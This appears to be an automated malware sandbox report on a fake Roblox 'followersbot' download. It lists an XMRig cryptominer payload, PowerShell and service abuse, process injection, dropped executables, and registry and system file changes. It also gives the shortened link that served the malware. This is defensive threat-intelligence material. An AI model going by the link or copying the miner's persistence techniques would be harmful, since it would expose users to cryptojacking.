Analysis Overview
Threat Level: Known bad
The file https://bit.ly/followersbot_rblx was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
Xmrig family
xmrig
XMRig Miner payload
Creates new service(s)
Command and Scripting Interpreter: PowerShell
Stops running service(s)
Executes dropped EXE
Loads dropped DLL
Drops file in System32 directory
Suspicious use of SetThreadContext
UPX packed file
Drops file in Program Files directory
Launches sc.exe
Browser Information Discovery
Detects Pyinstaller
Suspicious behavior: GetForegroundWindowSpam
Enumerates system info in registry
Modifies Internet Explorer settings
Delays execution with timeout.exe
Checks processor information in registry
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Uses Volume Shadow Copy service COM API
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of UnmapMainImage
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Opens file in notepad (likely ransom note)
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-27 11:41
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-27 11:41
Reported
2024-10-27 11:47
Platform
win10ltsc2021-20241023-en
Max time kernel
335s
Max time network
331s
Command Line
Signatures
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1784 created 600 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
| PID 5400 created 600 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
| PID 7068 created 600 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
| PID 5664 created 600 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
| PID 3464 created 5688 | N/A | C:\Windows\System32\svchost.exe | C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe |
Xmrig family
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Creates new service(s)
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\followersbot\9SHCODL.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\followersbot\9SHCODL.exe | N/A |
| N/A | N/A | C:\ProgramData\khcaldwkpicy\tonbcjgtfgwe.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\followersbot\9SHCODL.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\followersbot\9SHCODL.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe | N/A |
| N/A | N/A | C:\ProgramData\khcaldwkpicy\tonbcjgtfgwe.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe | N/A |
Loads dropped DLL
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\dialersvc64 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\khcaldwkpicy\tonbcjgtfgwe.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\Downloads\followersbot\9SHCODL.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\Downloads\followersbot\9SHCODL.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\khcaldwkpicy\tonbcjgtfgwe.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious use of SetThreadContext
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\2b12a2bb-9197-427f-bdee-328153f6caeb.tmp | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20241027114144.pma | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe | N/A |
Launches sc.exe
Browser Information Discovery
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key security queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\88c34bd0_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\3 = 04000000000000000000803f000000000000000000000000 | C:\Windows\System32\svchost.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\88c34bd0_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\4 = 0420000000000000180000000000000000000000000000000000803f0000803f | C:\Windows\System32\svchost.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\88c34bd0_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\5 = 0b0000000000000000000000000000000000000000000000 | C:\Windows\System32\svchost.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1730029393" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 | C:\Windows\Explorer.EXE | N/A |
